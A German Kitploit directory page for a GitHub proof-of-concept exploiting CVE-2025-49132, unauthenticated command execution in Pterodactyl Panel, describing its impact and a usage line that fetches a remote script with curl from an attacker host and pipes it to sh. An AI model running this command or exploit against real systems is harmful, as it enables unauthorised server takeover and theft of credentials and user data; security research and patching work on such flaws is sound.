Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-49132 — Der Fehler ermöglicht es einem Angreifer, beliebige Systembefehle auf dem Server auszuführen, der das Pterodactyl-Panel hostet, ohne vorherige Authentifizierung. | Kitploit
Tools/GitHubGitHub/4nuxd/cve-2025-49132
SchwachstellenanalyseExploitationWebanwendungs-ExploitationCommand and ControlPayload-Entwicklung
GitHub4nuxd/cve-2025-49132

CVE-2025-49132

Der Fehler ermöglicht es einem Angreifer, beliebige Systembefehle auf dem Server auszuführen, der das Pterodactyl-Panel hostet, ohne vorherige Authentifizierung.

Repository anzeigen
vor 6 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Auswirkungen

Durch die Verwendung von /locales/locale.json mit den Abfrageparametern locale und namespace kann ein Angreifer beliebigen Code ausführen, ohne authentifiziert zu sein.

Mit der Fähigkeit, beliebigen Code auszuführen, kann diese Schwachstelle auf unendlich viele Arten ausgenutzt werden. Sie könnte genutzt werden, um Zugriff auf den Server des Panels zu erhalten, Anmeldedaten aus der Konfiguration des Panels (.env oder anderweitig) auszulesen, sensible Informationen aus der Datenbank zu extrahieren (wie Benutzerdetails [Benutzername, E-Mail, Vor- und Nachname, gehashtes Passwort, IP-Adressen usw.]), auf Dateien von Servern zuzugreifen, die vom Panel verwaltet werden, usw.

Verwendung

root@kitploit:~

python poc.py --target "pterodactyl.htb" --cmd 'curl http://10.10.14.22:8080/dbs.sh | sh' 

Tool herunterladen